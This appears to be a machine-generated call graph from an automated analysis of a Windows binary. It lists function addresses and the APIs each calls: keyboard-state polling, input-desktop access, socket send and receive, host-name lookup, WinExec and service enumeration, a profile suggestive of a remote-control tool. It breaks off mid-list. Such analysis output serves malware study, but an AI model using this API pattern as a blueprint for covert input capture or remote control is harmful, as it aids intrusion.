21956 7ff7e5128c64 21956->21948 21963 7ff7e5132ed0 70 API calls 2 library calls 21956->21963 21964 7ff7e5132c70 70 API calls 3 library calls 21956->21964 21965 7ff7e512abd8 GetModuleHandleW GetProcAddress ExitProcess malloc 21956->21965 21957->21948 21957->21952 21957->21956 21958 7ff7e5128cb2 21957->21958 21966 7ff7e5133238 DecodePointer 21957->21966 21960 7ff7e512ffc8 _errno 69 API calls 21958->21960 21960->21951 21961->21911 21963->21956 21964->21956 21967 7ff7e5133253 21966->21967 21967->21957 21971 7ff7e51337c4 GetLastError FlsGetValue 21968->21971 21970 7ff7e512ffd1 21970->21958 21972 7ff7e51337ea 21971->21972 21973 7ff7e5133832 SetLastError 21971->21973 21983 7ff7e51332ec 21972->21983 21973->21970 21976 7ff7e51337ff FlsSetValue 21977 7ff7e513382b 21976->21977 21978 7ff7e5133815 21976->21978 21997 7ff7e5128bf4 21977->21997 21988 7ff7e513370c 21978->21988 21982 7ff7e5133830 21982->21973 21984 7ff7e5133311 21983->21984 21986 7ff7e5133351 21984->21986 21987 7ff7e513332f Sleep 21984->21987 22003 7ff7e5139234 21984->22003 21986->21973 21986->21976 21987->21984 21987->21986 22011 7ff7e51377d0 21988->22011 21990 7ff7e5133765 21991 7ff7e51376d0 __tzset LeaveCriticalSection 21990->21991 21992 7ff7e513377a 21991->21992 21993 7ff7e51377d0 _lock 70 API calls 21992->21993 21994 7ff7e5133784 ___lc_codepage_func 21993->21994 21995 7ff7e51376d0 __tzset LeaveCriticalSection 21994->21995 21996 7ff7e51337b6 GetCurrentThreadId 21995->21996 21996->21973 21998 7ff7e5128bf9 RtlFreeHeap 21997->21998 22002 7ff7e5128c29 realloc 21997->22002 21999 7ff7e5128c14 21998->21999 21998->22002 22000 7ff7e512ffc8 _errno 68 API calls 21999->22000 22001 7ff7e5128c19 GetLastError 22000->22001 22001->22002 22002->21982 22004 7ff7e5139249 22003->22004 22010 7ff7e5139266 22003->22010 22005 7ff7e5139257 22004->22005 22004->22010 22006 7ff7e512ffc8 _errno 69 API calls 22005->22006 22008 7ff7e513925c 22006->22008 22007 7ff7e513927e HeapAlloc 22007->22008 22007->22010 22008->21984 22009 7ff7e5133238 _callnewh DecodePointer 22009->22010 22010->22007 22010->22008 22010->22009 22012 7ff7e51377ee 22011->22012 22013 7ff7e51377ff EnterCriticalSection 22011->22013 22017 7ff7e51376e8 70 API calls 6 library calls 22012->22017 22015 7ff7e51377f3 22015->22013 22018 7ff7e512af34 70 API calls 6 library calls 22015->22018 22017->22015 22018->22013 22019->21921 22020->21924 22022 7ff7e513297e 22021->22022 22023 7ff7e51329bd RaiseException 22022->22023 22023->21927 22025 7ff7e5107b84 22024->22025 22026 7ff7e5107b6d 22024->22026 22044 7ff7e513285c 22025->22044 22027 7ff7e5132950 RaiseException 22026->22027 22027->22025 22030 7ff7e5107bc9 GetLastError 22031 7ff7e5132950 RaiseException 22030->22031 22033 7ff7e5107be4 22031->22033 22032 7ff7e5107c18 SetThreadPriority 22035 7ff7e5107c43 ResumeThread 22032->22035 22036 7ff7e5107c27 GetLastError 22032->22036 22033->22032 22034 7ff7e5107c0b 22033->22034 22037 7ff7e5132950 RaiseException 22033->22037 22034->22032 22039 7ff7e5107c52 GetLastError 22035->22039 22040 7ff7e5107c6e LeaveCriticalSection 22035->22040 22038 7ff7e5132950 RaiseException 22036->22038 22037->22034 22041 7ff7e5107c42 22038->22041 22042 7ff7e5132950 RaiseException 22039->22042 22040->21931 22041->22035 22043 7ff7e5107c6d 22042->22043 22043->22040 22045 7ff7e5132887 22044->22045 22046 7ff7e513289c 22044->22046 22047 7ff7e512ffc8 _errno 70 API calls 22045->22047 22050 7ff7e51332ec _getdrive 70 API calls 22046->22050 22048 7ff7e513288c 22047->22048 22067 7ff7e51349d4 22048->22067 22052 7ff7e51328b0 22050->22052 22051 7ff7e5107bb9 22051->22030 22051->22033 22053 7ff7e5132920 22052->22053 22062 7ff7e5133848 22052->22062 22054 7ff7e5128bf4 free 70 API calls 22053->22054 22058 7ff7e5132928 22054->22058 22057 7ff7e513370c __getgmtimebuf 70 API calls 22059 7ff7e51328cc CreateThread 22057->22059 22058->22051 22070 7ff7e5130008 70 API calls 2 library calls 22058->22070 22059->22051 22061 7ff7e5132918 GetLastError 22059->22061 22061->22053 22063 7ff7e51337c4 __getgmtimebuf 70 API calls 22062->22063 22064 7ff7e5133853 22063->22064 22065 7ff7e51328bd 22064->22065 22071 7ff7e512af34 70 API calls 6 library calls 22064->22071 22065->22057 22072 7ff7e5134964 DecodePointer 22067->22072 22070->22051 22071->22065 22073 7ff7e51349a2 22072->22073 22074 7ff7e51349c3 22072->22074 22073->22051 22079 7ff7e5134930 16 API calls malloc 22074->22079 22080->21941 23117 7ff7e50a54a0 109 API calls 4 library calls 23118 7ff7e50a5ca0 331 API calls 4 library calls 23119 7ff7e508cca0 115 API calls 23122 7ff7e50f3ca0 75 API calls 3 library calls 23124 7ff7e5098ed0 127 API calls _getdrive 22081 7ff7e50936d0 SetErrorMode 22082 7ff7e5093734 22081->22082 22204 7ff7e5073730 22082->22204 22085 7ff7e5093799 22208 7ff7e50933a0 22085->22208 22086 7ff7e50937b4 22122 7ff7e50939df 22086->22122 22220 7ff7e508f940 22086->22220 22088 7ff7e50939ea 22089 7ff7e5073730 _RunAllParam 89 API calls 22088->22089 22096 7ff7e5093a11 22089->22096 22090 7ff7e5127220 _getdrive 8 API calls 22091 7ff7e5097ff0 22090->22091 22092 7ff7e50937ce 22235 7ff7e512851c 22092->22235 22094 7ff7e5093825 22095 7ff7e51292a4 __wtomb_environ 70 API calls 22094->22095 22097 7ff7e5093838 22095->22097 22101 7ff7e5097ef3 22096->22101 22256 7ff7e50dd170 22096->22256 22098 7ff7e51292a4 __wtomb_environ 70 API calls 22097->22098 22099 7ff7e5093842 22098->22099 22241 7ff7e50da320 22099->22241 22103 7ff7e5073730 _RunAllParam 89 API calls 22101->22103 22101->22122 22116 7ff7e5097f3e 22103->22116 22105 7ff7e5093867 22110 7ff7e5128bf4 free 70 API calls 22105->22110 22112 7ff7e5093874 22105->22112 22106 7ff7e5093a76 22108 7ff7e5073730 _RunAllParam 89 API calls 22106->22108 22107 7ff7e5128bf4 free 70 API calls 22107->22105 22109 7ff7e5093a8e timeGetTime 22108->22109 22111 7ff7e5093aaf 22109->22111 22110->22112 22260 7ff7e50d5f30 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection 22111->22260 22114 7ff7e5093905 22112->22114 22117 7ff7e50938d0 SleepEx 22112->22117 22112->22122 22118 7ff7e5073730 _RunAllParam 89 API calls 22114->22118 22115 7ff7e5093abc 22119 7ff7e5093ac0 EnterCriticalSection 22115->22119 22123 7ff7e5093b17 _vsnprintf_l 22115->22123 22267 7ff7e50dab00 95 API calls _RunAllParam 22116->22267 22117->22112 22117->22122 22131 7ff7e5093947 22118->22131 22125 7ff7e5093af7 22119->22125 22122->22090 22124 7ff7e5093bd1 GetComputerNameA 22123->22124 22126 7ff7e5093c52 22124->22126 22134 7ff7e5093bec 22124->22134 22261 7ff7e508aed0 89 API calls _vsnprintf_l 22125->22261 22128 7ff7e5093c83 gethostname 22126->22128 22137 7ff7e5093c57 22126->22137 22132 7ff7e5093caf 22128->22132 22128->22137 22129 7ff7e5093b0d LeaveCriticalSection 22129->22123 22246 7ff7e50da290 22131->22246 22263 7ff7e5093220 71 API calls 2 library calls 22132->22263 22262 7ff7e5128e5c 70 API calls 4 library calls 22134->22262 22136 7ff7e50939c2 22136->22122 22139 7ff7e5073730 _RunAllParam 89 API calls 22136->22139 22264 7ff7e50dd710 15 API calls 22137->22264 22139->22122 22140 7ff7e5093ec4 22140->22122 22265 7ff7e50dd600 14 API calls 22140->22265 22142 7ff7e5093eed 22142->22122 22143 7ff7e5073730 _RunAllParam 89 API calls 22142->22143 22144 7ff7e5093f0d EnterCriticalSection 22143->22144 22146 7ff7e51292a4 __wtomb_environ 70 API calls 22144->22146 22147 7ff7e5093f5f CreateRectRgn 22146->22147 22148 7ff7e5093f95 DeleteObject 22147->22148 22149 7ff7e5128bf4 free 70 API calls 22148->22149 22150 7ff7e5093faa LeaveCriticalSection 22149->22150 22266 7ff7e5107d90 EnterCriticalSection SetThreadPriority GetLastError LeaveCriticalSection RaiseException 22150->22266 22205 7ff7e5073765 GetCurrentThreadId GetThreadDesktop 22204->22205 22206 7ff7e5073746 22204->22206 22205->22085 22206->22205 22268 7ff7e50c3740 89 API calls 3 library calls 22206->22268 22209 7ff7e50933c1 22208->22209 22210 7ff7e50dd170 2 API calls 22209->22210 22211 7ff7e50933cf 22210->22211 22212 7ff7e50933d3 GetLastError 22211->22212 22215 7ff7e50933f1 22211->22215 22213 7ff7e5073730 _RunAllParam 89 API calls 22212->22213 22213->22215 22214 7ff7e5093441 22216 7ff7e5073730 _RunAllParam 89 API calls 22214->22216 22219 7ff7e509349e 22214->22219 22215->22214 22218 7ff7e5073730 _RunAllParam 89 API calls 22215->22218 22217 7ff7e509351a 22216->22217 22217->22086 22218->22214 22219->22086 22232 7ff7e508f980 22220->22232 22222 7ff7e508fb50 22234 7ff7e508fb49 22222->22234 22309 7ff7e5128bbc 70 API calls swscanf 22222->22309 22223 7ff7e508fae6 SleepEx 22223->22232 22224 7ff7e5127220 _getdrive 8 API calls 22225 7ff7e508fc50 22224->22225 22225->22088 22225->22092 22227 7ff7e508fb8c 22233 7ff7e5073730 _RunAllParam 89 API calls 22227->22233 22227->22234 22229 7ff7e508fa5e EnterCriticalSection 22231 7ff7e508fa91 LeaveCriticalSection 22229->22231 22231->22232 22232->22222 22232->22223 22232->22229 22232->22234 22269 7ff7e5127c50 22232->22269 22275 7ff7e50dd1f0 GetTickCount 22232->22275 22283 7ff7e50dd890 22232->22283 22233->22234 22234->22224 22237 7ff7e512854e _vsnprintf_l 22235->22237 22236 7ff7e512ffc8 _errno 70 API calls 22239 7ff7e5128558 22236->22239 22237->22236 22238 7ff7e5128563 22237->22238 22238->22094 22240 7ff7e51349d4 _invalid_parameter_noinfo 17 API calls 22239->22240 22240->22238 22242 7ff7e50da340 FindWindowExA 22241->22242 22243 7ff7e5093856 22242->22243 22244 7ff7e50da35d GetWindowThreadProcessId GetCurrentProcessId 22242->22244 22243->22105 22243->22107 22243->22112 22244->22242 22245 7ff7e50da37c PostMessageA 22244->22245 22245->22243 22247 7ff7e50da303 22246->22247 22248 7ff7e50da2b0 22246->22248 22252 7ff7e50da340 FindWindowExA 22247->22252 22248->22247 22249 7ff7e50da2b9 FindWindowA 22248->22249 22250 7ff7e50da2dd PostMessageA 22249->22250 22251 7ff7e50da2cd 22249->22251 22250->22136 22251->22136 22253 7ff7e50da392 22252->22253 22254 7ff7e50da35d GetWindowThreadProcessId GetCurrentProcessId 22252->22254 22253->22136 22254->22252 22255 7ff7e50da37c PostMessageA 22254->22255 22255->22253 22257 7ff7e50dd182 22256->22257 22258 7ff7e50dd18a setsockopt 22256->22258 22257->22106 22258->22257 22259 7ff7e50dd1b5 setsockopt 22258->22259 22259->22106 22260->22115 22261->22129 22262->22126 22263->22137 22264->22140 22265->22142 22267->22122 22268->22205 22270 7ff7e5127c83 _vsnprintf_l 22269->22270 22271 7ff7e512ffc8 _errno 70 API calls 22270->22271 22274 7ff7e5127c98 22270->22274 22272 7ff7e5127c8d 22271->22272 22273 7ff7e51349d4 _invalid_parameter_noinfo 17 API calls 22272->22273 22273->22274 22274->22232 22276 7ff7e50dd22f 22275->22276 22277 7ff7e50dd2b6 22275->22277 22279 7ff7e50ddd90 11 API calls 22276->22279 22278 7ff7e50dd25f 22277->22278 22310 7ff7e50ddd90 22277->22310 22278->22232 22281 7ff7e50dd25b 22279->22281 22281->22277 22281->22278 22282 7ff7e50ddd90 11 API calls 22281->22282 22282->22281 22284 7ff7e50dd8c6 22283->22284 22285 7ff7e50dd8cb 22283->22285 22284->22285 22286 7ff7e50dda85 22284->22286 22287 7ff7e50dd8eb 22284->22287 22285->22232 22286->22285 22288 7ff7e50ddab0 WSAGetLastError 22286->22288 22289 7ff7e50dda8e recv 22286->22289 22291 7ff7e50ddac7 22286->22291 22290 7ff7e50dd907 EnterCriticalSection 22287->22290 22293 7ff7e50dd911 22287->22293 22288->22285 22288->22286 22289->22286 22290->22293 22292 7ff7e5073730 _RunAllParam 89 API calls 22291->22292 22292->22285 22294 7ff7e50dd958 22293->22294 22301 7ff7e50dd986 22293->22301 22295 7ff7e5073730 _RunAllParam 89 API calls 22294->22295 22306 7ff7e50dd96e 22295->22306 22296 7ff7e50dda1e 22296->22285 22307 7ff7e50dda77 LeaveCriticalSection 22296->22307 22297 7ff7e50dd9c6 WSAGetLastError 22297->22301 22302 7ff7e50dd9f7 WSAGetLastError 22297->22302 22298 7ff7e50dd99e recv 22300 7ff7e50dd9b4 22298->22300 22299 7ff7e50dd978 LeaveCriticalSection 22299->22285 22300->22297 22300->22301 22303 7ff7e50dd9d9 22300->22303 22301->22296 22301->22297 22301->22298 22304 7ff7e5073730 _RunAllParam 89 API calls 22302->22304 22305 7ff7e5073730 _RunAllParam 89 API calls 22303->22305 22304->22306 22308 7ff7e50dd9f1 22305->22308 22306->22285 22306->22299 22307->22285 22308->22306 22309->22227 22311 7ff7e50dde3d 22310->22311 22315 7ff7e50dddd4 22310->22315 22312 7ff7e5127220 _getdrive 8 API calls 22311->22312 22314 7ff7e50ddea6 22312->22314 22313 7ff7e50dddf0 select 22313->22315 22314->22278 22315->22311 22315->22313 22316 7ff7e50dde55 __WSAFDIsSet 22315->22316 22316->22315 22317 7ff7e50dde67 send 22316->22317 22317->22315 23127 7ff7e50800d0 88 API calls 2 library calls 23129 7ff7e50728d0 81 API calls 23130 7ff7e509f8c0 72 API calls _getdrive 23131 7ff7e50992c0 119 API calls _RunAllParam 23134 7ff7e50922c0 114 API calls 5 library calls 23139 7ff7e5087ac0 10 API calls _RunAllParam 23140 7ff7e509f6f0 10 API calls _getdrive 23141 7ff7e50990f0 EnterCriticalSection LeaveCriticalSection 23142 7ff7e509d0f0 DialogBoxParamA 23143 7ff7e508a6f0 GetWindowLongPtrA SetWindowLongPtrA SetDlgItemTextA SetForegroundWindow EndDialog 23146 7ff7e50a08e0 117 API calls _RunAllParam 23148 7ff7e50a1ae0 15 API calls _getdrive 22684 7ff7e50980da 22703 7ff7e5080270 22684->22703 22686 7ff7e50981c6 22687 7ff7e51292a4 __wtomb_environ 70 API calls 22686->22687 22688 7ff7e50981e7 CreateRectRgn 22687->22688 22710 7ff7e50721e0 22688->22710 22690 7ff7e5098211 LoadLibraryA 22691 7ff7e5098247 GetProcAddress 22690->22691 22692 7ff7e509825e 22690->22692 22691->22692 22693 7ff7e5073730 _RunAllParam 89 API calls 22692->22693 22694 7ff7e509828f 22693->22694 22695 7ff7e5073730 _RunAllParam 89 API calls 22694->22695 22696 7ff7e50982f7 22695->22696 22697 7ff7e5127978 81 API calls 22696->22697 22698 7ff7e509831e 22697->22698 22699 7ff7e5127978 81 API calls 22698->22699 22700 7ff7e5098454 22699->22700 22701 7ff7e5098469 22700->22701 22712 7ff7e5083fb0 22700->22712 22704 7ff7e51292a4 __wtomb_environ 70 API calls 22703->22704 22705 7ff7e508028f CreateRectRgn 22704->22705 22706 7ff7e51292a4 __wtomb_environ 70 API calls 22705->22706 22707 7ff7e50802b3 CreateRectRgn 22706->22707 22708 7ff7e51292a4 __wtomb_environ 70 API calls 22707->22708 22709 7ff7e50802d7 CreateRectRgn 22708->22709 22709->22686 22711 7ff7e5072259 22710->22711 22711->22690 22713 7ff7e5083fe1 _vsnprintf_l 22712->22713 22714 7ff7e508408b GetComputerNameA 22713->22714 22715 7ff7e50840a6 22714->22715 22716 7ff7e50840d0 LoadLibraryA 22714->22716 22715->22716 22717 7ff7e50840fd 22716->22717 22718 7ff7e50840e6 22716->22718 22717->22701 22720 7ff7e507a040 8 API calls 22718->22720 22720->22717 22721 7ff7e5094cdb 22722 7ff7e50dd890 97 API calls 22721->22722 22723 7ff7e5094cfc 22722->22723 22724 7ff7e5094d52 22723->22724 22784 7ff7e50c0650 22723->22784 22930 7ff7e509f010 SetEvent 22724->22930 22728 7ff7e5097c72 22729 7ff7e5097c81 Sleep 22728->22729 22730 7ff7e5097c95 22728->22730 22729->22730 22731 7ff7e5097ca6 FlushFileBuffers 22730->22731 22732 7ff7e5097cf7 22730->22732 22731->22732 22733 7ff7e5097ce6 CloseHandle 22731->22733 22734 7ff7e5097d08 FlushFileBuffers 22732->22734 22735 7ff7e5097d59 22732->22735 22733->22732 22734->22735 22736 7ff7e5097d48 CloseHandle 22734->22736 22932 7ff7e50da3b0 93 API calls 2 library calls 22735->22932 22736->22735 22739 7ff7e5097d62 22740 7ff7e5097d85 22739->22740 22933 7ff7e50a2170 16 API calls 22739->22933 22743 7ff7e5097dbc 22740->22743 22744 7ff7e5097d9d CloseDesktop 22740->22744 22741 7ff7e50a2220 GetLastError PostMessageA EnterCriticalSection LeaveCriticalSection 22756 7ff7e50940c8 22741->22756 22751 7ff7e5073730 _RunAllParam 89 API calls 22743->22751 22744->22743 22745 7ff7e5097da7 22744->22745 22746 7ff7e5073730 _RunAllParam 89 API calls 22745->22746 22746->22743 22748 7ff7e50931b0 27 API calls 22748->22756 22749 7ff7e5073730 89 API calls _RunAllParam 22771 7ff7e5094003 22749->22771 22750 7ff7e509c590 16 API calls 22750->22756 22752 7ff7e5097dfc GetModuleFileNameA 22751->22752 22757 7ff7e5097e15 22752->22757 22758 7ff7e5097e56 LoadLibraryA 22752->22758 22754 7ff7e509419d GetTickCount 22754->22756 22755 7ff7e5073730 _RunAllParam 89 API calls 22759 7ff7e5094075 OpenInputDesktop 22755->22759 22756->22728 22756->22741 22756->22748 22756->22750 22756->22754 22762 7ff7e50dd890 97 API calls 22756->22762 22766 7ff7e50dd440 16 API calls 22756->22766 22756->22771 22928 7ff7e50d95d0 EnterCriticalSection LeaveCriticalSection 22756->22928 22929 7ff7e509c6f0 18 API calls _RunAllParam 22756->22929 22934 7ff7e512a140 70 API calls 3 library calls 22757->22934 22763 7ff7e5097e6b GetProcAddress 22758->22763 22764 7ff7e5097e9d 22758->22764 22760 7ff7e5097c54 22759->22760 22759->22771 22767 7ff7e5073730 _RunAllParam 89 API calls 22760->22767 22762->22756 22768 7ff7e5097e8f FreeLibrary 22763->22768 22777 7ff7e5097edd 22764->22777 22935 7ff7e508e580 97 API calls _RunAllParam 22764->22935 22765 7ff7e5097e26 22765->22758 22766->22756 22767->22728 22768->22764 22771->22728 22771->22749 22771->22755 22771->22756 22773 7ff7e5097c47 CloseDesktop 22771->22773 22775 7ff7e50940bf CloseDesktop 22771->22775 22926 7ff7e50da5b0 98 API calls 2 library calls 22771->22926 22927 7ff7e50da3b0 93 API calls 2 library calls 22771->22927 22931 7ff7e509c4e0 93 API calls _RunAllParam 22771->22931 22773->22728 22773->22760 22775->22756 22778 7ff7e5097fb2 22777->22778 22780 7ff7e5073730 _RunAllParam 89 API calls 22777->22780 22779 7ff7e5127220 _getdrive 8 API calls 22778->22779 22781 7ff7e5097ff0 22779->22781 22782 7ff7e5097f3e 22780->22782 22936 7ff7e50dab00 95 API calls _RunAllParam 22782->22936 22785 7ff7e5073730 _RunAllParam 89 API calls 22784->22785 22786 7ff7e50c068e 22785->22786 22787 7ff7e50c09af VkKeyScanA 22786->22787 22788 7ff7e50c102e 22786->22788 22790 7ff7e5073730 _RunAllParam 89 API calls 22786->22790 22794 7ff7e50c09c2 22787->22794 22791 7ff7e50c109a 22788->22791 22795 7ff7e5073730 _RunAllParam 89 API calls 22788->22795 22789 7ff7e5073730 _RunAllParam 89 API calls 22792 7ff7e50c0a08 22789->22792 22793 7ff7e50c0743 22790->22793 22804 7ff7e50c10ee 22791->22804 22971 7ff7e50c2ef0 81 API calls 22791->22971 22796 7ff7e50c0d54 GetKeyState 22792->22796 22797 7ff7e50c0a13 22792->22797 22799 7ff7e5073730 _RunAllParam 89 API calls 22793->22799 22794->22789 22795->22791 22800 7ff7e50c0d71 22796->22800 22798 7ff7e50c0d0a 22797->22798 22803 7ff7e5073730 _RunAllParam 89 API calls 22797->22803 22798->22724 22799->22787 22801 7ff7e50c0dbf 22800->22801 22802 7ff7e50c0eaa 22800->22802 22806 7ff7e50c0dc9 GetAsyncKeyState 22801->22806 22807 7ff7e50c0e0a 22801->22807 22810 7ff7e5073730 _RunAllParam 89 API calls 22802->22810 22809 7ff7e50c0a33 22803->22809 22937 7ff7e50c1620 22804->22937 22806->22807 22812 7ff7e50c0dd8 MapVirtualKeyA 22806->22812 22814 7ff7e50c0e14 GetAsyncKeyState 22807->22814 22815 7ff7e50c0e58 22807->22815 22816 7ff7e5073730 _RunAllParam 89 API calls 22809->22816 22817 7ff7e50c0fe2 MapVirtualKeyA 22810->22817 22811 7ff7e50c10df 22972 7ff7e50c2370 71 API calls 22811->22972 22960 7ff7e50874c0 18 API calls 22812->22960 22813 7ff7e50c1108 22830 7ff7e50c115f GetAsyncKeyState 22813->22830 22847 7ff7e50c111e 22813->22847 22814->22815 22820 7ff7e50c0e24 MapVirtualKeyA 22814->22820 22823 7ff7e50c0e62 GetAsyncKeyState 22815->22823 22824 7ff7e50c0eb3 22815->22824 22821 7ff7e50c0a4b 22816->22821 22966 7ff7e50874c0 18 API calls 22817->22966 22961 7ff7e50874c0 18 API calls 22820->22961 22828 7ff7e50c0a58 22821->22828 22829 7ff7e50c0d37 22821->22829 22823->22802 22825 7ff7e50c0e76 MapVirtualKeyA 22823->22825 22824->22802 22835 7ff7e50c0ec6 GetAsyncKeyState 22824->22835 22836 7ff7e50c0f17 GetAsyncKeyState 22824->22836 22962 7ff7e50874c0 18 API calls 22825->22962 22826 7ff7e50c0def 22833 7ff7e5073730 _RunAllParam 89 API calls 22826->22833 22838 7ff7e50c0ad4 GetAsyncKeyState 22828->22838 22839 7ff7e50c0b27 GetAsyncKeyState 22828->22839 22840 7ff7e5073730 _RunAllParam 89 API calls 22829->22840 22841 7ff7e50c1174 GetAsyncKeyState 22830->22841 22830->22847 22831 7ff7e50c1001 22967 7ff7e50c02a0 109 API calls _RunAllParam 22831->22967 22833->22807 22834 7ff7e50c124d MapVirtualKeyA 22974 7ff7e50874c0 18 API calls 22834->22974 22835->22802 22849 7ff7e50c0eda MapVirtualKeyA 22835->22849 22854 7ff7e50c0f62 GetAsyncKeyState 22836->22854 22855 7ff7e50c0f27 MapVirtualKeyA 22836->22855 22837 7ff7e50c0e3b 22850 7ff7e5073730 _RunAllParam 89 API calls 22837->22850 22851 7ff7e50c0b1e 22838->22851 22852 7ff7e50c0aec MapVirtualKeyA 22838->22852 22844 7ff7e50c0b77 GetAsyncKeyState 22839->22844 22845 7ff7e50c0b3c MapVirtualKeyA 22839->22845 22840->22798 22841->22847 22853 7ff7e50c1184 22841->22853 22843 7ff7e50c0e8d 22860 7ff7e5073730 _RunAllParam 89 API calls 22843->22860 22844->22851 22863 7ff7e50c0b87 MapVirtualKeyA 22844->22863 22945 7ff7e50874c0 18 API calls 22845->22945 22847->22834 22848 7ff7e50c1151 22847->22848 22848->22834 22963 7ff7e50874c0 18 API calls 22849->22963 22850->22815 22865 7ff7e5073730 _RunAllParam 89 API calls 22851->22865 22944 7ff7e50874c0 18 API calls 22852->22944 22853->22847 22875 7ff7e5073730 _RunAllParam 89 API calls 22853->22875 22854->22802 22857 7ff7e50c0f72 MapVirtualKeyA 22854->22857 22964 7ff7e50874c0 18 API calls 22855->22964 22856 7ff7e50c100a 22968 7ff7e50c02a0 109 API calls _RunAllParam 22856->22968 22965 7ff7e50874c0 18 API calls 22857->22965 22860->22802 22862 7ff7e50c1267 22862->22862 22946 7ff7e50874c0 18 API calls 22863->22946 22874 7ff7e50c0bf1 MapVirtualKeyA 22865->22874 22867 7ff7e50c0f40 22878 7ff7e5073730 _RunAllParam 89 API calls 22867->22878 22869 7ff7e50c0b03 22880 7ff7e5073730 _RunAllParam 89 API calls 22869->22880 22870 7ff7e50c1013 22969 7ff7e50c02a0 109 API calls _RunAllParam 22870->22969 22871 7ff7e50c0b55 22882 7ff7e5073730 _RunAllParam 89 API calls 22871->22882 22873 7ff7e50c0ef1 22884 7ff7e5073730 _RunAllParam 89 API calls 22873->22884 22947 7ff7e50874c0 18 API calls 22874->22947 22877 7ff7e50c11a5 22875->22877 22886 7ff7e50c1206 22877->22886 22887 7ff7e50c11ba 22877->22887 22888 7ff7e50c0f5e 22878->22888 22879 7ff7e50c0f8b 22889 7ff7e5073730 _RunAllParam 89 API calls 22879->22889 22880->22851 22891 7ff7e50c0b73 22882->22891 22883 7ff7e50c0ba0 22892 7ff7e5073730 _RunAllParam 89 API calls 22883->22892 22884->22802 22885 7ff7e50c0c08 MapVirtualKeyA 22948 7ff7e50874c0 18 API calls 22885->22948 22897 7ff7e5073730 _RunAllParam 89 API calls 22886->22897 22907 7ff7e50c11fd 22886->22907 22896 7ff7e5073730 _RunAllParam 89 API calls 22887->22896 22887->22907 22888->22854 22889->22802 22890 7ff7e50c101c 22970 7ff7e50c02a0 109 API calls _RunAllParam 22890->22970 22891->22844 22892->22851 22895 7ff7e50c0c1f MapVirtualKeyA 22949 7ff7e50874c0 18 API calls 22895->22949 22900 7ff7e50c11ce CreateThread CloseHandle 22896->22900 22901 7ff7e50c121a 22897->22901 22898 7ff7e50c1025 22898->22788 22900->22907 22973 7ff7e50da910 116 API calls _RunAllParam 22901->22973 22902 7ff7e5073730 _RunAllParam 89 API calls 22905 7ff7e50c1230 WinExec 22902->22905 22903 7ff7e50c0c36 MapVirtualKeyA 22950 7ff7e50874c0 18 API calls 22903->22950 22905->22848 22907->22902 22908 7ff7e50c0c53 MapVirtualKeyA 22951 7ff7e50874c0 18 API calls 22908->22951 22910 7ff7e50c0c6c MapVirtualKeyA 22952 7ff7e50874c0 18 API calls 22910->22952 22912 7ff7e50c0c89 MapVirtualKeyA 22953 7ff7e50874c0 18 API calls 22912->22953 22914 7ff7e50c0ca2 MapVirtualKeyA 22954 7ff7e50874c0 18 API calls 22914->22954 22916 7ff7e50c0cbf MapVirtualKeyA 22955 7ff7e50874c0 18 API calls 22916->22955 22918 7ff7e50c0cd8 MapVirtualKeyA 22956 7ff7e50874c0 18 API calls 22918->22956 22920 7ff7e50c0cef 22957 7ff7e50c02a0 109 API calls _RunAllParam 22920->22957 22922 7ff7e50c0cf8 22958 7ff7e50c02a0 109 API calls _RunAllParam 22922->22958 22924 7ff7e50c0d01 22959 7ff7e50c02a0 109 API calls _RunAllParam 22924->22959 22926->22771 22927->22771 22929->22756 22930->22771 22931->22771 22932->22739 22934->22765 22936->22778 22940 7ff7e50c163b 22937->22940 22938 7ff7e50c1665 22938->22813 22940->22938 22975 7ff7e50c2f30 22940->22975 22943 7ff7e50c169c 22943->22813 22944->22869 22945->22871 22946->22883 22947->22885 22948->22895 22949->22903 22950->22908 22951->22910 22952->22912 22953->22914 22954->22916 22955->22918 22956->22920 22957->22922 22958->22924 22959->22798 22960->22826 22961->22837 22962->22843 22963->22873 22964->22867 22965->22879 22966->22831 22967->22856 22968->22870 22969->22890 22970->22898 22971->22811 22972->22804 22973->22907 22974->22862 22979 7ff7e50c2ff0 22975->22979 22977 7ff7e50c1689 22978 7ff7e50c2550 71 API calls 22977->22978 22978->22943 22980 7ff7e5127978 81 API calls 22979->22980 22981 7ff7e50c3003 22980->22981 22982 7ff7e50c3008 22981->22982 23007 7ff7e512749c 70 API calls std::exception::operator= 22981->23007 22982->22977 22984 7ff7e50c3043 22985 7ff7e5132950 RaiseException 22984->22985 22986 7ff7e50c3060 GetWindowLongPtrA 22985->22986 22987 7ff7e50c3140 22986->22987 22988 7ff7e50c30b9 22986->22988 22989 7ff7e50c3265 EndDialog 22987->22989 22990 7ff7e50c31ae SetWindowLongPtrA GetDlgItem 22988->22990 22993 7ff7e50c30c5 22988->22993 22991 7ff7e50c31a7 22989->22991 22992 7ff7e50c31de SendMessageA GetDlgItem 22990->22992 22994 7ff7e5127220 _getdrive 8 API calls 22991->22994 22997 7ff7e50c320f SetForegroundWindow 22992->22997 22993->22987 22993->22991 22995 7ff7e50c30e4 22993->22995 22996 7ff7e50c314a GetDlgItem SendMessageA 22993->22996 22998 7ff7e50c328a 22994->22998 22995->22991 22999 7ff7e50c30ef GetDlgItem SendMessageA 22995->22999 23000 7ff7e50c3174 SendMessageA 22996->23000 23001 7ff7e50c318f 22996->23001 23003 7ff7e50c322e 22997->23003 22998->22977 22999->22987 23002 7ff7e50c3117 SendMessageA 22999->23002 23000->23001 23001->22989 23002->22987 23004 7ff7e50c3132 23002->23004 23005 7ff7e50c323a GetDlgItem EnableWindow 23003->23005 23006 7ff7e50c324d GetDlgItem EnableWindow 23003->23006 23004->22987 23005->22991 23006->22991 23007->22984 23149 7ff7e50756e0 DeleteCriticalSection DeleteCriticalSection FreeLibrary DeleteFileA 23151 7ff7e509ab10 96 API calls 2 library calls 23152 7ff7e5094003 195 API calls 2 library calls 23153 7ff7e5083110 73 API calls 2 library calls 23154 7ff7e5079910 11 API calls _getdrive 23155 7ff7e507a910 99 API calls _RunAllParam 23156 7ff7e5080310 73 API calls free 23157 7ff7e5075910 13 API calls _getdrive 23158 7ff7e50a0700 9 API calls 23159 7ff7e50a5100 82 API calls 2 library calls 23160 7ff7e50a34f7 10 API calls _getdrive 23008 7ff7e5079d00 23029 7ff7e50729a0 23008->23029 23010 7ff7e5079db3 OpenSCManagerA 23011 7ff7e5079de0 EnumServicesStatusA 23010->23011 23015 7ff7e5079dc9 23010->23015 23013 7ff7e5079fed CloseServiceHandle 23011->23013 23014 7ff7e5079e2b GetLastError 23011->23014 23012 7ff7e5079d6b 23012->23010 23013->23015 23014->23013 23016 7ff7e5079e3c 23014->23016 23017 